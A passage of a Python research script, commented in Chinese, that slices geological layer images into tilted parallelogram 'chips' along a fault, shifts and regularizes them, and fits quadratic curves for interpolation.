pos_top=np.array([-min(I),I_J[min(I)]])\n pos_bottom=np.array([-max(I),I_J[max(I)]])\n \n# print(pos_bottom)\n# print(pos_top)\n \n #斜率\n k=(pos_top-pos_bottom)[0]/(pos_top-pos_bottom)[1]\n \n #倾角\n tilt=180*np.arctan(abs(k))/np.pi\n \n return tilt,k\n\n#============================================================================== \n#plate对象转化为fractions\ndef Plate2Fractions(plate):\n \n #将top和others收录进来\n total_fractions=plate.others\n total_fractions.append(plate.top)\n \n return total_fractions\n\n#将plate对象沿着倾角方向切片\n#which_layer是被转化的layer\n#which_fault是划分上下盘的fault\n#width是切片宽度\ndef Layer2Chip(which_layer,which_fault,width,img_tag):\n\n #获取fault倾角和斜率\n tilt,k=InitTilt(which_fault)\n \n #取绝对值方便计算\n k=abs(k)\n \n #分别取layer中的最大值和最小值\n I=[pos[0] for pos in which_layer.edge]\n J=[pos[1] for pos in which_layer.edge]\n\n #分成n段:四边形角落多出一块\n n=int(np.ceil((max(J)-min(J)+(max(I)-min(I))/k)/width))\n \n #chip总坐标列表\n total_chip=[]\n \n #总chip对象列表\n Chip=[]\n \n #大平行四边形四个顶点\n pos_A=[min(I),max(J)+(max(I)-min(I))/k]\n pos_B=[max(I),max(J)]\n \n for m in range(n): \n \n pos_C=[min(I),pos_A[1]-width]\n pos_D=[max(I),pos_A[1]-width]\n \n ABCD=[pos_A,pos_B,pos_C,pos_D]\n \n #在这四个点横纵坐标的最大范围内进行搜索\n I_quadrangle_point=[pos[0] for pos in ABCD]\n J_quadrangle_point=[pos[1] for pos in ABCD]\n \n I_max=max(I_quadrangle_point)\n I_min=min(I_quadrangle_point) \n J_max=max(J_quadrangle_point)\n J_min=min(J_quadrangle_point)\n \n# print(I_max,I_min,J_max,J_min)\n \n this_chip=o.chip()\n \n #初始化\n this_chip.k=k\n this_chip.part=m\n this_chip.tilt=tilt\n this_chip.tag=which_layer.tag\n this_chip.inclination=which_fault.inclination\n this_chip.content=[]\n \n #分段有利于提高计算速度\n n_special=np.ceil((max(I)-min(I))/k)\n \n #头尾\n if 0<=n<n_special or n-n_special<=n:\n \n #判断是否在该四边形内部\n for i in range(I_min,I_max+1):\n \n #用斜率联系IJ\n I_offset=i-I_min\n J_offset=I_offset/k\n \n for j in range(int(np.round(J_min-J_offset)),\n int(np.round(J_max-J_offset)+1)):\n \n if [i,j] in which_layer.content:\n this_chip.content.append([i,j])\n \n #中间\n if n_special<=n<n-n_special: \n \n for i in range(I_min,I_max+1):\n \n #用斜率联系IJ\n I_offset=i-I_min\n J_offset=I_offset/k\n \n for j in range(int(np.round(J_min-J_offset)),\n int(np.round(J_max-J_offset)+1)):\n \n if img_tag[i,j]==this_chip.tag:\n this_chip.content.append([i,j])\n \n pos_A[1]-=width\n pos_B[1]-=width \n \n #7.11\n \n# print(len(this_chip.content))\n \n #集合成大列表\n total_chip+=this_chip.content\n Chip.append(this_chip)\n\n return total_chip,Chip\n\n#8.14\n#============================================================================== \n#更新Chip的id函数\ndef UpdateID(which_Chip):\n \n #初始化哟\n chips_id=1\n \n #逐层更新\n for this_chips in which_Chip.total_chips:\n \n this_chips.id=which_Chip.id+'-'+str(chips_id)\n chips_id+=1\n \n#8.12\n#============================================================================== \n\"\"\"\ncase1:如果top没有怎么办?连接在同一层的高度\n#chips的Init函数有问题,没法得到正确的top和others ok\ncase2:写一个完整的移动函数\ncase3:研究收缩和膨胀\n#再写一个layer填充函数\ncase4:给chip也命名?ok\ncase5:对补充出来的点进行平滑(美观) ok\ncase6:如何在top缺失的情况下将每一层桥接 ok\n#对chips和Chip都建立top和others的chip和chips \n\"\"\" \n#多个chip移动函数\ndef ChipMove(Chip,this_layer):\n \n total_chip=[]\n \n for this_chip in Chip:\n \n if this_chip.content!=[]:\n \n #对chip对象作移动处理\n I_chip=[pos[0] for pos in this_chip.content]\n \n #移动参照点\n I_layer=[pos[0] for pos in this_layer.edge]\n \n #移动距离\n I_offset_chip=min(I_layer)-min(I_chip)\n \n# print(len(this_chip.content))\n# print(I_offset_chip)\n \n #移动chip\n this_chip.Move(I_offset_chip,0)\n \n total_chip+=this_chip.content\n \n return total_chip,Chip \n \n#============================================================================== \n#写一个plate转化为chip对象的函数\n#which_plate是被转化的plate\n#which_fault是划分上下盘的fault\n#width是切片宽度\ndef Plate2Chip(which_plate,which_fault,img_tag,width,Chip_id):\n \n #获取fault倾角和斜率\n tilt,k=InitTilt(which_fault)\n \n# print(k)\n \n #分别取layer中的最大值和最小值\n I=[pos[0] for pos in which_plate.content]\n J=[pos[1] for pos in which_plate.content]\n \n #大偏移距(绝对值)\n J_total_offset=(max(I)-min(I))/abs(k) \n \n #分段有利于提高计算速度:特殊区段\n n_special=int(np.ceil(J_total_offset/width))\n \n #分成n段:四边形角落多出一块\n n=int(np.ceil((max(J)-min(J)+(J_total_offset))/width))\n \n# print(n)\n# print(n_special)\n# print(len(which_plate.content))\n \n #plate中的所偶tag\n tags=[this_fraction.tag for this_fraction in which_plate.Tofractions()]\n total_tag=list(set(tags))\n \n# print(total_tag)\n \n #总chips对象列表\n total_chips=[]\n \n #创建一个表示平行四边形端点的列表\n that_Chip_node_quadrangle=[]\n \n #大平行四边形四个顶点\n# print(type(I))\n# print(type(J))\n\n #斜率分类讨论 \n if k>0: \n pos_A=[min(I),max(J)]\n pos_B=[max(I),max(J)+J_total_offset]\n \n if k<0:\n pos_A=[min(I),max(J)]\n pos_B=[max(I),max(J)-J_total_offset]\n \n# print(pos_A,pos_B)\n# print(len(which_plate.content))\n \n for m in range(n): \n \n #创建一个表示平行四边形端点的列表\n that_chips_node_quadrangle=[]\n \n pos_C=[min(I),pos_A[1]-width]\n pos_D=[max(I),pos_B[1]-width]\n \n ABCD=[pos_A,pos_B,pos_C,pos_D]\n \n #在这四个点横纵坐标的最大范围内进行搜索\n I_quadrangle_point=[pos[0] for pos in ABCD]\n J_quadrangle_point=[pos[1] for pos in ABCD]\n \n I_max=max(I_quadrangle_point)\n I_min=min(I_quadrangle_point) \n J_max=max(J_quadrangle_point)\n J_min=min(J_quadrangle_point)\n \n# print(I_max,I_min,J_max,J_min)\n \n this_chip=o.chip()\n \n #初始化\n this_chip.k=k\n this_chip.part=m\n this_chip.tilt=tilt\n this_chip.inclination=which_fault.inclination\n this_chip.content=[]\n \n #填充横向点\n if k>0: \n for JJ in range(int(np.ceil(J_total_offset+J_min)),int(np.ceil(J_max))): \n \n that_chips_node_quadrangle.append([I_max,JJ-int(np.ceil(J_total_offset))])\n that_chips_node_quadrangle.append([I_min,JJ])\n \n if k<0: \n for JJ in range(int(np.ceil(J_total_offset+J_min)),int(np.ceil(J_max))): \n \n that_chips_node_quadrangle.append([I_min,JJ])\n that_chips_node_quadrangle.append([I_max,JJ+int(np.ceil(J_total_offset))])\n \n# print(len(node_quadrangle))\n \n #收录which_plate中的点\n for i in range(I_min,I_max+1):\n \n #用斜率联系IJ\n I_offset=i-I_min\n J_offset=I_offset/k\n \n #收录端点\n start=int(np.round(J_max-J_offset-width))\n end=int(np.round(J_max-J_offset))\n \n that_chips_node_quadrangle.append([i,start])\n that_chips_node_quadrangle.append([i,end])\n \n for j in range(start,end):\n \n #根据tag值进行收录\n if img_tag[i,j] in total_tag: \n \n #增加判断条件\n if [i,j] in which_plate.content:\n \n this_chip.content.append([i,j])\n \n# print(len(this_chip.content)) \n \n #计算下一个平行四边形 \n pos_A[1]-=width\n pos_B[1]-=width \n \n #一个chip分成多个chip\n #这一个小四边形中的所有chip\n total_chip=[]\n \n #将this_chip拆成不同tag的��个部分\n for target_tag in total_tag:\n \n that_chip=o.chip()\n that_chip.tag=target_tag\n that_chip.k=k\n that_chip.part=m\n that_chip.tilt=tilt\n that_chip.inclination=which_fault.inclination\n that_chip.content=[]\n \n for pos in this_chip.content:\n \n #根据tag进行划分\n if img_tag[pos[0],pos[1]]==target_tag: \n \n that_chip.content.append(pos)\n \n# print(len(that_chip.content))\n \n #确保that_chip有点东西才添加它\n if that_chip.content!=[]:\n \n total_chip.append(that_chip)\n \n #建立新的chips对象\n that_chips=o.chips()\n \n #初始化\n that_chips.k=k\n that_chips.part=m\n that_chips.tilt=tilt\n that_chips.total_chip=total_chip \n that_chips.node_quadrangle=that_chips_node_quadrangle\n that_chips.Init() \n that_chips.need_to_advanced_regularization=False\n \n #特殊处理区段\n if m<n_special or m>=n-n_special:\n \n #得有点东西吧\n if that_chips.content!=[]: \n if that_chips.content!=None: \n \n that_chips.need_to_advanced_regularization=True\n \n# #检验一波\n# if that_chips.top!=None:\n# \n# print(that_chips.top.tag)\n \n #添加至chips列表\n total_chips.append(that_chips)\n that_Chip_node_quadrangle+=that_chips_node_quadrangle\n \n #建立新的Chip对象\n that_Chip=o.Chip()\n \n #初始化各属性\n that_Chip.id=Chip_id\n that_Chip.k=k\n that_Chip.tilt=tilt\n that_Chip.total_chips=total_chips\n that_Chip.plate=which_plate\n that_Chip.node_quadrangle=that_Chip_node_quadrangle\n that_Chip.Init()\n that_Chip.UpdateID()\n \n return that_Chip\n\n#Chips表示Chip对象列表\ndef ShowChips(Chips,img_rgb,rgb_dict,grid='off'):\n \n #显示找到的内容 \n background_rgb=img_rgb[0,0]\n img_temp=np.full(np.shape(img_rgb),background_rgb)\n \n #给像素点赋予rgb值\n for this_Chip in Chips:\n \n #Chip的颜色\n for this_chips in this_Chip.total_chips:\n \n for this_chip in this_chips.total_chip:\n \n for pos in this_chip.content:\n \n img_temp[int(pos[0]),int(pos[1])]=rgb_dict[this_chip.tag]\n \n #网格表示\n if grid=='on':\n \n #平行四边形边框\n for pos in this_Chip.node_quadrangle:\n \n img_temp[int(pos[0]),int(pos[1])]=np.array([0,0,0]) \n \n #在图中显示\n plt.figure()\n plt.imshow(img_temp)\n \n#8.11\n#============================================================================== \n#写一个Chip移动的函数\ndef ChipRegularization(which_Chip,adjustment=True):\n \n print('')\n \n# print(which_Chip.id)\n# print(which_Chip.top.tag)\n# print(which_Chip.total_tag) \n \n \"\"\"第一轮正则化\"\"\" \n #第一步将平行四边形中的点都挪到node_quadrangle顶部 \n #切成chips一个个移动好吧\n for this_chips in which_Chip.total_chips:\n \n# print(len(this_chips.content))\n# print(len(this_chips.node_quadrangle))\n \n #确保平行四边形内有content\n if this_chips.content==None:\n continue\n \n if this_chips.content==[]:\n continue\n \n if this_chips.top.tag!=which_Chip.top.tag:\n continue\n \n if this_chips.need_to_advanced_regularization: \n continue\n \n# print(this_chips.top.tag)\n \n #横纵坐标\n I_this_chips_content=[pos[0] for pos in this_chips.content]\n I_this_chips_node_quadrangle=[pos[0] for pos in this_chips.node_quadrangle]\n \n #this_chips中的J最高点\n I_this_chips_top_content=min(I_this_chips_content)\n I_this_chips_top_node_quadrangle=min(I_this_chips_node_quadrangle)\n \n #i,j方向上的移动距离\n i_offset=I_this_chips_top_node_quadrangle-I_this_chips_top_content\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n this_chips.Move(i_offset,j_offset)\n \n #正则化完成的标志\n this_chips.regularization=True\n \n# print('round 1')\n \n print('......') \n print('the end of round 1')\n\n #8.16\n \n \"\"\"第二轮正则化\"\"\" \n\n print('')\n \n #通过need_to_advanced_regularization参数计算n_special\n id_list_to_calculate_n_special=[]\n \n for this_chips in which_Chip.total_chips:\n \n if this_chips.need_to_advanced_regularization:\n \n id_list_to_calculate_n_special.append(int(this_chips.id.split('-')[1]))\n\n# print(id_list_to_calculate_n_special) \n \n #计算n_special之路\n n_special=id_list_to_calculate_n_special[0]\n \n for k in range(len(id_list_to_calculate_n_special)): \n \n #判断是否连续\n if id_list_to_calculate_n_special[k]==id_list_to_calculate_n_special[k+1]-1: \n n_special+=1\n \n #若这种连续中止了\n else:\n break\n \n# print(n_special)\n\n #8.17\n \n #虽然经过了初始化的处理,但是这几个节点还是需要计算的\n #左区间的起点和终点\n left_external=1\n left_internal=n_special\n \n #右区间的起点和终点\n right_external=id_list_to_calculate_n_special[-1]\n right_internal=id_list_to_calculate_n_special[-1]-n_special+1\n \n# print(left_start,left_end)\n# print(right_start,right_end)\n \n #分段函数,且从某一头取滑动点集\n #分组调试\n \n #左段 \n for this_id in range(left_internal,left_external-1,-1):\n \n SubRegularization(which_Chip,this_id,'right',adjustment)\n \n #右段 \n for this_id in range(right_internal,right_external+1,+1):\n \n SubRegularization(which_Chip,this_id,'left',adjustment) \n \n \"\"\"有问题\"\"\"\n #中段\n for this_id in range(left_internal,right_internal):\n \n SubRegularization(which_Chip,this_id,'middle',adjustment)\n\n print('......') \n print('the end of round 2')\n\n#9.18\n#============================================================================== \n\"\"\"第一轮正则化\"\"\" \ndef PreRegularization(which_Chip,this_id):\n\n #第一步将平行四边形中的点都挪到node_quadrangle顶部 \n #切成chips一个个移动好吧\n this_chips_id=which_Chip.id+'-'+str(this_id)\n \n #找到这个chips\n this_chips=SearchByID([which_Chip],this_chips_id)\n \n# print(len(this_chips.content))\n# print(len(this_chips.node_quadrangle))\n \n #确保平行四边形内有content\n if this_chips.content==None: \n return\n \n if this_chips.content==[]:\n return\n \n if this_chips.top.tag!=which_Chip.top.tag:\n return\n# \n if this_chips.need_to_advanced_regularization: \n return\n \n# print(this_chips.top.tag)\n \n #横纵坐标\n I_this_chips_content=[pos[0] for pos in this_chips.content]\n I_this_chips_node_quadrangle=[pos[0] for pos in this_chips.node_quadrangle]\n \n #this_chips中的J最高点\n I_this_chips_top_content=min(I_this_chips_content)\n I_this_chips_top_node_quadrangle=min(I_this_chips_node_quadrangle)\n \n #i,j方向上的移动距离\n i_offset=I_this_chips_top_node_quadrangle-I_this_chips_top_content\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n this_chips.Move(i_offset,j_offset)\n \n #正则化完成的标志\n this_chips.regularization=True\n \n# print('round 1')\n \n#9.2 \n\n#功能细化\n#mode表示左中右\n\"\"\"第二轮正则化\"\"\" \ndef SubRegularization(which_Chip,this_id,mode,adjustment):\n \n this_chips_id=which_Chip.id+'-'+str(this_id)\n \n #找到这个chips\n this_chips=SearchByID([which_Chip],this_chips_id)\n \n# print(this_chips.id)\n# print('round 2 '+mode) \n\n #确保平行四边形内有content\n if this_chips.content==None or this_chips.content==[]:\n return \n \n #如果不需要这一步,那就滚吧\n if not this_chips.need_to_advanced_regularization: \n return \n \n #调整端点\n if adjustment:\n \n #横纵坐标\n I_this_chips_content=[pos[0] for pos in this_chips.content]\n \n I_this_chips_node_quadrangle=[pos[0] for pos in this_chips.node_quadrangle]\n \n #this_chips中的J最高点\n I_this_chips_top_content=min(I_this_chips_content)\n I_this_chips_top_node_quadrangle=min(I_this_chips_node_quadrangle)\n \n #i,j方向上的移动距离\n i_offset=I_this_chips_top_node_quadrangle-I_this_chips_top_content\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n this_chips.Move(i_offset,j_offset)\n \n #正则化完成的标志\n this_chips.regularization=True \n \n #从这里开始使用chipsNearby函数\n chips_nearby=chipsNearby(which_Chip,this_chips,3,mode)\n\n# print(len(chips_nearby))\n \n #8.31\n \n #chips_nearby所有的id列表\n chips_nearby_id=[this_near_chips.id for this_near_chips in chips_nearby]\n\n# print(chips_nearby_id)\n\n #寻觅chips_nearby的两个端点chips\n chips_nearby_id_int=[int(this_near_chips_id.split('-')[1]) for this_near_chips_id in chips_nearby_id]\n \n# print(chips_nearby_id_int)\n \n #chips_nearby的端点\n limit_chips_nearby=[]\n \n #用于计算limit的content内容\n content_limit_chips_nearby=[]\n \n #chips_nearby内部端点的id\n max_id_internal=which_Chip.id+'-'+str(max(chips_nearby_id_int))\n min_id_internal=which_Chip.id+'-'+str(min(chips_nearby_id_int))\n \n #chips_nearby外部端点的id\n max_id_external=which_Chip.id+'-'+str(max(chips_nearby_id_int)+1)\n min_id_external=which_Chip.id+'-'+str(min(chips_nearby_id_int)-1)\n \n id_limit_chips_nearby=[max_id_internal,min_id_internal,\n max_id_external,min_id_external]\n \n# print(id_limit_chips_nearby)\n \n #判断存在性\n for this_limit_id in id_limit_chips_nearby:\n \n if SearchByID([which_Chip],this_limit_id) is not None:\n \n #chips上船\n limit_chips_nearby.append(SearchByID([which_Chip],this_limit_id))\n \n #content上船\n if this_limit_id==max_id_external or this_limit_id==min_id_external:\n \n content_limit_chips_nearby+=limit_chips_nearby[-1].content\n \n #检验这几个id好吧\n# print([item.id for item in limit_chips_nearby])\n \n #9.1\n \n# print(len(content_limit_chips_nearby))\n \n #用于计算的threshold\n J_content_limit_chips_nearby=[pos[1] for pos in content_limit_chips_nearby] \n \n limit=[max(J_content_limit_chips_nearby),min(J_content_limit_chips_nearby)]\n \n# print(limit)\n \n #8.24\n \n #计算相邻chips的所有tag集合\n total_tag_chips_nearby=[]\n \n #计算各层的最高点\n for this_near_chips in chips_nearby:\n \n if len(this_near_chips.content)==0:\n continue\n \n total_tag_this_near_chips=[this_chip.tag for this_chip in this_near_chips.total_chip]\n \n #每个chips的tag集合\n total_tag_chips_nearby+=total_tag_this_near_chips\n \n# print('check 1')\n \n #如果啥都没有那也别玩了\n if total_tag_chips_nearby==[]:\n return \n \n# print('check 2')\n \n #将其取集合运算并转化为列表\n total_tag_chips_nearby=list(set(total_tag_chips_nearby))\n \n# print(total_tag_chips_nearby)\n \n #更正\n total_tag_this_chips=[]\n \n for this_chip in this_chips.total_chip:\n \n if this_chip.content==[] or this_chip.content==None:\n continue\n \n total_tag_this_chips.append(this_chip.tag)\n \n# print(total_tag_this_chips) \n \n \"\"\"权利的交接\"\"\"\n import copy\n total_tag_chips_nearby=copy.deepcopy(total_tag_this_chips)\n \n #total_tag对应的下家\n total_tag_chips_nearby_total_chip=[]\n \n #建立不同tag的dict组成的列表 \n for this_tag in total_tag_chips_nearby:\n \n #this_tag在nearby中所有的chip的集合\n this_tag_chips_nearby_total_chip=[]\n \n for this_near_chips in chips_nearby:\n \n this_chip_id=this_near_chips.id+'|'+str(this_tag)\n \n# print(this_chip_id)\n \n this_chip=SearchByID([which_Chip],this_chip_id) \n this_tag_chips_nearby_total_chip.append(this_chip)\n \n #建立索引:map表示映射关系 \n total_tag_chips_nearby_total_chip.append(this_tag_chips_nearby_total_chip)\n \n #建立map的集合\n total_map=dict(zip(total_tag_chips_nearby,total_tag_chips_nearby_total_chip))\n \n# print(total_map)\n# print(list(total_map.keys()))\n \n #8.25\n \n #用于存储所有的this_tag_top_chips_nearby的列表\n top_total_tag=[]\n \n for this_tag in list(total_map.keys()):\n \n #chips_nearby中每个tag的chip的最高点I的集合 \n I_top_this_tag_chips_nearby=[]\n \n #以及I_J的集合\n I_J_top_this_tag_chips_nearby=[]\n \n for this_chip in total_map[this_tag]:\n \n #确保非空\n if this_chip==None:\n continue \n \n if this_chip.content!=[] or this_chip.content!=None:\n\n I_this_chip=[pos[0] for pos in this_chip.content] \n J_this_chip=[pos[1] for pos in this_chip.content] \n \n #建立索引\n map_I_J_this_chip=dict(zip(I_this_chip,J_this_chip))\n \n I_top_this_chip=min(I_this_chip)\n J_top_this_chip=map_I_J_this_chip[I_top_this_chip]\n \n I_top_this_tag_chips_nearby.append(I_top_this_chip)\n I_J_top_this_tag_chips_nearby.append([I_top_this_chip,J_top_this_chip])\n \n #8.28\n \n# print(I_top_this_tag_chips_nearby)\n# print(I_J_top_this_tag_chips_nearby)\n \n #如果top_this_tag_chips_nearby为空:不可以让分母为0对吧\n if I_top_this_tag_chips_nearby==[] or I_J_top_this_tag_chips_nearby==[]:\n \n #要添加进列表的值\n top_this_tag=None\n \n #无异常就正常计算 \n #一般情况下使用插值\n else: \n top_this_tag=CalculateThisPoint(I_J_top_this_tag_chips_nearby,\n 'interpolation',\n this_chips,\n limit)\n #特殊情况下使用平均值\n if top_this_tag==None:\n \n top_this_tag=CalculateThisPoint(I_J_top_this_tag_chips_nearby,\n 'average')\n \n top_total_tag.append(top_this_tag)\n \n# print(top_total_tag) \n \n #建立this_tag和this_tag_top的索引\n map_total_tag_top=dict(zip(total_tag_chips_nearby,top_total_tag))\n \n# print(list(map_total_tag_top.values()))\n# print(map_total_tag_top)\n# print(this_chips.top.tag)\n \n new_top_this_chips=min(map_total_tag_top.values())\n \n #计算咯\n #计算this_chips各个tag的chip相应的最高I值\n if this_chips.content!=[]:\n \n# print('good')\n \n I_this_chips=[pos[0] for pos in this_chips.content]\n now_top_this_chips=min(I_this_chips)\n \n# print(this_chips.id)\n# print(new_top_this_chips)\n# print(now_top_this_chips)\n \n #i,j方向上的移动距离\n i_offset=new_top_this_chips-now_top_this_chips\n j_offset=int(np.floor(-i_offset/which_Chip.k))\n \n# print(i_offset,j_offset)\n \n this_chips.Move(i_offset,j_offset)\n \n I_this_chips=[pos[0] for pos in this_chips.content]\n now_top_this_chips=min(I_this_chips)\n \n# print(now_top_this_chips)\n \n #正则化完成的标志\n this_chips.regularization=True \n \n#8.16\n#============================================================================== \n#搜索相邻10个参数的函数\n#which_Chip表示这件事发生在某个Chip中\n#which_chips表示被搜索的chips\n#amount表示参与计算的点的数量\n#side表示该chips位于整体chips的什么位置\ndef chipsNearby(which_Chip,which_chips,amount,side):\n \n #计算which_Chip里chips的id上下限\n total_chips_id=[int(this_chips.id.split('-')[1]) for this_chips in which_Chip.total_chips]\n \n #上下限id\n chips_id_max=which_Chip.id+'-'+str(max(total_chips_id))\n chips_id_min=which_Chip.id+'-'+str(min(total_chips_id))\n \n# print(chips_id_max,chips_id_min)\n \n #最终结果得到集合\n chips_nearby=[]\n \n #处理顶部异常的chips\n if which_chips.need_to_advanced_regularization:\n \n start_chips_id=int(which_chips.id.split('-')[1])\n \n #初始化左右id,用split函数分别取id的前后半段\n left_id=which_chips.id.split('-')[0]+'-'+str(start_chips_id)\n right_id=which_chips.id.split('-')[0]+'-'+str(start_chips_id)\n \n #count大于amount时停止\n count=0\n \n #左端的chips们的相应参数由其右端的中间参数集合得到\n if side=='left':\n \n while count<amount:\n \n left_id=which_Chip.id+'-'+str(int(left_id.split('-')[1])-1)\n \n #到顶了就结束\n if left_id==chips_id_min:\n break\n \n #前提是他们存在呢\n if SearchByID([which_Chip],left_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],left_id))\n \n# print('left')\n \n #右端的chips们的相应参数由其左端的中间参数集合得到\n if side=='right':\n while count<amount:\n \n right_id=which_Chip.id+'-'+str(int(right_id.split('-')[1])+1)\n \n #到头了就结束\n if right_id==chips_id_max:\n break\n \n #判断存在这样一个事物\n if SearchByID([which_Chip],right_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],right_id))\n \n# print('right')\n \n #两头增长,数量为amount时停止,取的平均\n if side=='middle':\n while count<amount:\n \n #左右开弓\n left_id=which_Chip.id+'-'+str(int(left_id.split('-')[1])-1)\n right_id=which_Chip.id+'-'+str(int(right_id.split('-')[1])+1)\n \n #到顶了就结束\n if left_id==chips_id_min or right_id==chips_id_max:\n break\n \n #前提是他们存在呢\n if SearchByID([which_Chip],left_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],left_id))\n \n# print('middle-left')\n \n #判断存在这样一个事物\n if SearchByID([which_Chip],right_id) is not None:\n \n count+=1\n chips_nearby.append(SearchByID([which_Chip],right_id))\n \n# print('middle-right')\n \n return chips_nearby\n \n#8.15\n#============================================================================== \n#写一个通过id搜索chips的函数\n#Chips为本场比赛的Chip集合\ndef SearchByID(Chips,ID):\n \n #可搜索Chip chips chip\n #搜索Chip\n for this_Chip in Chips:\n if this_Chip.id==ID:\n return this_Chip\n \n #搜索chips \n if '-' in ID and '|' not in ID:\n for this_Chip in Chips:\n for this_chips in this_Chip.total_chips:\n if this_chips.id==ID:\n return this_chips\n \n #搜索chip\n if '-' in ID and '|' in ID:\n for this_Chip in Chips:\n for this_chips in this_Chip.total_chips:\n for this_chip in this_chips.total_chip:\n if this_chip.id==ID:\n return this_chip\n\n#8.25\n#============================================================================== \n#计算列表平均值的函数\ndef GetAverage(which_data):\n sum_data=0\n \n for item in which_data:\n sum_data+=item\n \n return sum_data/len(which_data)\n \n#计算列表中位数的函数\ndef GetMedian(which_data):\n \n data=sorted(which_data)\n size=len(which_data)\n \n #判断列表长度为偶数\n if size%2==0: \n return (data[size//2]+data[size//2-1])/2\n \n #判断列表长度为奇数 \n if size%2==1: \n return data[(size-1)//2] \n \n#计算某点某特征值的函数\n#which_data表示需要计算的集合\n#mode表示计算的模式:average表示平均值,median表示中位数,interpolation表示插值 \n#which_chips表示需要计算高度的那个chips\n#threshold表示用于计算的自变量的取值范围 \ndef CalculateThisPoint(which_data,mode,which_chips=None,threshold=None):\n \n #还原成相应的I坐标\n I_which_data=[pos[0] for pos in which_data]\n J_which_data=[pos[1] for pos in which_data]\n \n #平均值\n if mode=='average':\n return int(np.round(GetAverage(I_which_data)))\n \n #中位数\n if mode=='median':\n return int(np.round(GetMedian(I_which_data)))\n \n \"\"\"插值比较特殊:可能需要提供坐标???\"\"\"\n #插值\n if mode=='interpolation':\n \n# print(threshold)\n# print('......')\n# \n# print(which_data) \n# print('......')\n#\n# print(which_chips.content)\n# print('......')\n# \n# print(len(which_chips.content))\n# print('......')\n# \n# print(GetInterpolation(which_data,threshold))\n# print('......')\n# \n# print(len(GetInterpolation(which_data,threshold))) \n# print('......')\n \n result_interpolation=GetInterpolation(which_data,threshold)\n \n result_final=CrossDataAB(which_chips.content,result_interpolation)\n \n# print(result_final)\n# print('......')\n \n #9.2\n \n \"\"\"若结果不止一个,或为0,如何处理??\"\"\" \n #结果为空\n if len(result_final)==0:\n \n #neighbor大法好 \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n neighbordict=[(i,j) for i in [-1,0,1] for j in [-1,0,1]]\n \n #遍历插值结果\n for pos in result_interpolation:\n \n #逆时针遍历邻域内的点\n for item in neighbordict:\n \n #遍历新的坐标 \n new_pos=[pos[0]+item[0],pos[1]+item[1]]\n \n if new_pos in which_chips.content: \n \n if new_pos not in result_final:\n \n result_final.append(new_pos) \n \n #结果不止一个\n if len(result_final)>1:\n \n #计算which_data的中心\n center_which_data=[np.mean(I_which_data),np.mean(J_which_data)]\n \n #中心到各个result的距离\n distance_center2result=[Distance(this_pos,center_which_data) for this_pos in result_final]\n \n #距离和result建立键值对\n map_distance_center2result=dict(zip(distance_center2result,result_final))\n \n #返回距离最小的哥\n result_final=[map_distance_center2result[min(distance_center2result)]]\n \n #结果就一个,返回其I坐标 \n if len(result_final)==1:\n \n# print(result_final[0])\n \n return result_final[0][0]\n \n else:\n return None\n\n#8.29\n \n\"\"\"以下部分为计算插值系列函数\"\"\"\n#二次函数的标准形式\ndef func(params,x):\n \n a,b,c=params\n \n return a*x**2+b*x+c\n\n#误差函数,即拟合曲线所求的值与实际值的差\ndef error(params,x,y):\n return func(params,x)-y\n\n#对参数求解\ndef slovePara(X,Y):\n \n #p0里放的是a、b、c的初始值,这个值可以随意指定。\n #往后随着迭代次数增加,a、b、c将会不断变化,使得error函数的值越来越小。\n p0=[10,10,10]\n \n from scipy.optimize import leastsq\n #leastsq的返回值是一个tuple\n #它里面有两个元素,第一个元素是a、b、c的求解结果,第二个则为cost function的大小!\n Para=leastsq(error,p0,args=(X,Y))\n \n return Para\n \n#which_data表示参与的坐标\n#threshold是拟合出的曲线的自变量上下限列表\ndef GetInterpolation(which_data,threshold,show=False):\n \n #转化为一维列表\n I_which_data=[pos[0] for pos in which_data]\n J_which_data=[pos[1] for pos in which_data]\n \n #z幻化为np.array对象,便于处理:X为自变量,Y为因变量 \n X=np.array(J_which_data)\n Y=np.array(I_which_data)\n\n Para=slovePara(X,Y)\n a,b,c=Para[0]\n \n# print(a,b,c) \n \n #在threshold范围内直接画100个连续点\n amount=max(threshold)-min(threshold)+1\n x=np.linspace(min(threshold),max(threshold),amount) \n\n# print(amount)\n \n #函数式\n y=a*x*x+b*x+c \n \n #是否输出图形\n if show:\n \n #保留两位小数\n a=float('%0.2f'%a)\n b=float('%0.2f'%b)\n c=float('%0.2f'%c)\n \n print(\"a=\",a,\"b=\",b,\"c=\",c)\n print(\"cost:\" + str(Para[1]))\n print(\"求解的曲线是:\")\n print(\"y=\"+str(round(a,2))+\"x*x+\"+str(round(b,2))+\"x+\"+str(c))\n \n plt.figure(figsize=(8,6))\n plt.scatter(X,Y,color=\"green\",label=\"sample data\",linewidth=2)\n \n #画拟合直线\n plt.plot(x,y,color=\"red\",label=\"solution line\",linewidth=2)\n \n #绘制图例\n plt.legend() \n plt.show()\n \n #输出x和y组成的坐标集合\n return CombineXY(y,x)\n \n\"\"\"拿抛物线和chip作一个交集的运算\"\"\"\n\n#8.30 \n\n#定义一个组合对应位置x和y坐标的函数\n#to_int表示是否取整,默认为True\ndef CombineXY(x,y,to_int=True):\n \n #转为列表\n list(x),list(y)\n \n #输出结果的列表\n that_data=[]\n \n for k in range(len(x)):\n \n #如果取整\n if to_int: \n that_x=int(np.round(x[k]))\n that_y=int(np.round(y[k]))\n \n else:\n that_x=x[k]\n that_y=y[k]\n \n that_data.append([that_x,that_y])\n \n return that_data\n\n#定义过(x0,y0),斜率为k的像素点集合\n#threshold是自变量取值范围[x_min,x_max]\ndef GenerateLineList(x0,y0,k,threshold):\n \n #自变量x的取值范围为\n x=np.linspace(min(threshold),max(threshold),max(threshold)-min(threshold)+1) \n y=(x-x0)*k+y0\n \n return CombineXY(x,y)\n\n#计算集合data_A和data_B交集\ndef CrossDataAB(data_A,data_B):\n \n #结果列表\n data_cross=[]\n \n for pos in data_A:\n if pos in data_B:\n data_cross.append(pos)\n \n return data_cross\n\n#计算chips和曲线的交集坐标\n#parameters表示多项式的系数集合\n\"\"\"其实不用专门写这一个函数\"\"\"\ndef Convey(chips,data_curve):\n \n #chips的content和data_curve的交集\n return 